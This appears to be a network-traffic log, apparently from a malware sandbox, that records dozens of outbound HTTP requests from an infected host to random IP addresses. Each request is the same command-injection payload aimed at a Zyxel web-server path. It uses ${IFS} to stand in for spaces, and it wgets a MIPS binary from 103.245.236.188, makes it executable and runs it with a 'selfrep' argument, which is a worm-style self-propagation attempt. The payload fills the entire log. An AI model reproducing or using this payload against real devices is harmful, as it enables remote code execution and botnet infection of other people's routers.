                                                Jan 12, 2024 18:16:19.361552000 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3568192.168.2.2341110140.169.251.76443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:19.361605883 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3569192.168.2.2352738167.37.57.238443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:19.361639023 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3570192.168.2.2357086184.81.146.88443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:19.361680031 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3571192.168.2.2338704218.218.21.97443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:19.361702919 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3572192.168.2.235716479.163.171.222443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:19.361757994 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3573192.168.2.2341406211.148.92.4443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:19.361795902 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3574192.168.2.2349766117.132.138.98443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:19.361819983 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3575192.168.2.23423069.113.162.237443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:19.361882925 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3576192.168.2.234538061.7.155.119443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:19.361915112 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3577192.168.2.2354048180.62.18.137443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:19.361958027 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3578192.168.2.2359816195.206.89.18443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:19.361985922 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3579192.168.2.233925682.137.237.215443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:19.361985922 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3580192.168.2.235804445.22.109.18443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:19.362025976 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3581192.168.2.2341208174.93.103.200443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:19.362076044 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3582192.168.2.2356388198.24.175.78443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:19.362118959 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3583192.168.2.2349522156.188.227.30443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:19.362148046 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3584192.168.2.234177868.114.247.149443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:19.362191916 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3585192.168.2.2337570176.187.28.64443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:19.362221003 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3586192.168.2.234693286.132.183.170443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:19.362272024 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3587192.168.2.2356114153.51.105.234443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:19.362301111 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3588192.168.2.2339164166.86.74.46443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:19.362363100 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3589192.168.2.234328674.14.55.172443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:19.362413883 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3590192.168.2.2340814168.206.140.167443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:19.362458944 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3591192.168.2.2344090157.85.96.74443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:19.362503052 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3592192.168.2.2355568166.147.67.212443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:19.362526894 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3593192.168.2.2346762180.155.181.180443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:19.362587929 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3594192.168.2.2356378121.229.246.72443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:19.362603903 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3595192.168.2.2347356183.158.162.161443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:19.362629890 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3596192.168.2.235261235.129.25.139443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:19.362698078 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3597192.168.2.2344226171.158.65.157443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:19.362735033 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3598192.168.2.236052071.233.192.172443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:19.362771988 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3599192.168.2.2339734102.245.32.10443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:19.362797022 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3600192.168.2.2358122153.232.189.75443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:19.362833023 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3601192.168.2.2351408109.167.187.234443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:19.362852097 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3602192.168.2.234743025.38.115.182443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:19.362905979 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3603192.168.2.235233242.33.30.179443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:19.362976074 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3604192.168.2.234392471.56.85.144443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:19.363003016 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3605192.168.2.234916412.147.87.140443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:19.363029957 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3606192.168.2.2340622116.83.88.122443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:19.363071918 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3607192.168.2.2333570216.80.131.186443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:19.363101959 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3608192.168.2.2341788189.88.2.222443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:19.363140106 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3609192.168.2.2356478126.249.126.98443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:19.363195896 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3610192.168.2.2335462189.182.58.83443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:19.363234043 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3611192.168.2.2346760176.24.33.241443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:19.363255024 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3612192.168.2.2345822151.182.81.125443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:19.363307953 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3613192.168.2.236049877.20.102.237443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:19.363362074 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3614192.168.2.235906695.224.211.37443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:19.363404036 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3615192.168.2.236062066.87.41.55443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:19.363435984 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3616192.168.2.234333847.46.234.104443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:19.363526106 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3617192.168.2.235059054.143.223.156443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:19.363558054 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3618192.168.2.233741449.30.159.151443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:19.363604069 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3619192.168.2.2358456126.18.220.184443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:19.363626957 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3620192.168.2.2340846175.244.252.110443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:19.363663912 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3621192.168.2.2355818172.194.13.14443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:19.363692999 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3622192.168.2.2356726193.33.165.235443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:19.363746881 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3623192.168.2.235998864.131.117.17443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:19.363775969 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3624192.168.2.234299052.70.74.10443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:19.363843918 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3625192.168.2.234627877.67.161.94443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:19.363897085 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3626192.168.2.233749684.111.69.26443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:19.363945961 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3627192.168.2.2336868112.251.179.246443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:19.364007950 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3628192.168.2.2346608173.215.170.53443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:19.364010096 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3629192.168.2.2343386179.175.56.48443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:19.364073038 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3630192.168.2.234719466.148.147.222443
                                                TimestampBytes transferredDirectionData
